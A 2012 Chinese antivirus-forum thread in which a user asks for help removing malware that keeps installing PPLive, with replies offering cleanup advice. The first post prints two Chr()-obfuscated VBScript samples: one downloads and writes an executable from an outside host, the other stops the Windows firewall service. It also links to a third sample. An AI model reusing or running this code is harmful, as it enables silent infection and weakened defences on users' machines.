机器里发现的三个小东西，纠结中。。。

显示全部楼层 · 发表于 2012-4-3 13:37:09

在我哥们本本里发现了三个小东西。机器里装的小A能扫出来，但每次上网一会儿，桌面还是会出现2个PPLIVE的图标，并且流量监控里显示流量消耗很快，感觉是自动下载并在C盘下安装了PPLIVE软件，已在C盘PF(X86)下找到过PPLIVE的安装路径以及程序。卸载后还是不管用，一会儿又出来了。
我现在上传了2个VB文件的样本，还有一个可执行文件样本大于500K，传不上来。文件名是JACKVC.EXE

RUN.VBS https://www.virustotal.com/file/ ... nalysis/1333429767/

代码：Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(119)+Chr(119)+Chr(119)+Chr(46)+Chr(99)+Chr(104)+Chr(57)+Chr(53)+Chr(50)+Chr(46)+Chr(99)+Chr(111)+Chr(109)+Chr(47)+Chr(115)+Chr(101)+Chr(116)+Chr(117)+Chr(112)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)

RUN2.VBS
https://www.virustotal.com/file/ ... nalysis/1333430023/

代码：set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)

JACKVC.EXE
https://www.virustotal.com/file/ ... nalysis/1333430253/

想请教各位能否有办法清除掉，十分纠结。劳烦各位了。谢谢

显示全部楼层 · 发表于 2012-4-3 13:39:14

上面两个VB文件。。也不知道一堆Chr(num)是什么意思。。能否请教一下。。

显示全部楼层 · 发表于 2012-4-3 14:51:27

卡巴启发

显示全部楼层 · 发表于 2012-4-3 14:55:53

显示全部楼层 · 发表于 2012-4-3 14:55:56

本帖最后由陈识宇于 2012-4-3 15:00 编辑

落实一下：是小a扫出来的，还是实时监控报出来的？
每个文件，应该说明全路径
建议发帖到病毒救援区
用SREng做个智能扫描，上传

显示全部楼层 · 发表于 2012-4-3 14:59:06

STOP! Bitdefender blocked this web page.

The page you are trying to access contains malware.

Details:
Web Page: http://bbs.kafan.cn/forum.php?mo ... ;aid=MTU5MDE1MHx...
Detected viruses: Trojan.Script.191717

Access from your browser has been blocked.

Take me back to safety

显示全部楼层 · 发表于 2012-4-3 15:06:55

麻烦把第三个上传网盘

显示全部楼层 · 发表于 2012-4-3 16:25:15

Howl 发表于 2012-4-3 15:06
麻烦把第三个上传网盘

已上传迅雷网盘
http://www.xlpan.com/file/166420 ... 8-b638-e6857c034a54

显示全部楼层 · 发表于 2012-4-3 16:25:43

蓝天二号发表于 2012-4-3 14:51
卡巴启发

3Q

显示全部楼层 · 发表于 2012-4-3 16:26:06

dm34343667 发表于 2012-4-3 14:55

3Q

[病毒样本] 机器里发现的三个小东西，纠结中。。。

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源